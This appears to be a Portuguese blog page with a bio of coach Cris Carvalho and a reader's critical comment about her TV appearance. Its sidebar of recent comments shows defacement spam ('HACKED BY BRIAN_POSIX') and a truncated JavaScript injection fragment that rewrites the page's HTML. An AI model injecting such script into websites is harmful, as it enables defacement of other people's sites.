Cris Carvalho é Master Trainer Internacional, especialista em Coaching e Programação Neurolinguística. Membro da Sociedade Brasileira de Neurociência.
Membro do ICF- International Coaching Federation, Certificada com o grau de ACC (Associate Certified Coach).
Actua como Coach desde 2004 em Portugal e desde 2005 em Espanha e Brasil.
Coordena e desenvolve desde 2005 diversos eventos de desenvolvimento pessoal e executivo. Tem trazido até ao público português os conhecimentos centrais do Coaching e da Neurolinguística através de vários cursos e certificações com padrão internacional. Além do contacto directo com muitas pessoas através das suas formações, palestras e workshops, ajuda empresas e outras organizações a aumentarem as suas potencialidades e a expandirem os seus resultados.

 

Contacto: http://www.sejamuitomais.blogspot.com/



Ana Silva @ 05:24

Qui, 16/12/10

 

Só hoje vi esta rubrica, dia 16 de Dezembro, e são 4;50, concentro-me no vosso canal e deparo-me com a Ana Rita Claro, que Admiro, numa "conversa " com Cris Carvalho...
Fiquei de rastos, essa Sra., Cris Carvalho, conheci-a em tempos...
Não quero ser mesquinha...mas não quero realmente ser passiva...Tanto para dar, desde o interior na agricultura, como na escultura, e trazem, não sei pela mão de quem, tal personlidade, poderia admirar e respeitar...mas, o assunto, tema, VIDA, que nos traz em nada encaixa com as suas atitudes, com o seu "modus operandi"...
Nós fazemos a nossa vida e dependendo do ninho onde nasces, constrois ou destrois...Lindo , Lindo...é o africano lá mesmo da tribo, ou o brasileiro da favela, acordar e "trabalhar", "desejar", "VISULAIZAR", o que aspira.....Não me façam rir, ou por outro lado, prefiro nem chorar,,,,Vidas, são Vidas! O que é questionável é como demos espaço para pseudo especialistas entrarem num tema, que de mágico ou alterável, tem.... Que tristeza....Essa pessoa que dita nem sei bem o quÊ, faça uma favada á moda alentejana, aguente um casamento estranho, uma vida de sacrificio, ou então uma vida como a minha, não, não sou da estiva. não, não sou sou doméstica...não interessa o que sou...Mas uma coisa digo, era o que faltava darmos espaço para que alguem venha ditar o que nós já sabemos em sonhos o que ansiamos, o que admiramos, o que queremos... Viva! Nós!

De
 
Nome

Url

Email

Guardar Dados?

Ainda não tem um Blog no SAPO? Crie já um. É grátis.

Comentário

Máximo de 4300 caracteres



Copiar caracteres

 



O dono deste Blog optou por gravar os IPs de quem comenta os seus posts.

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO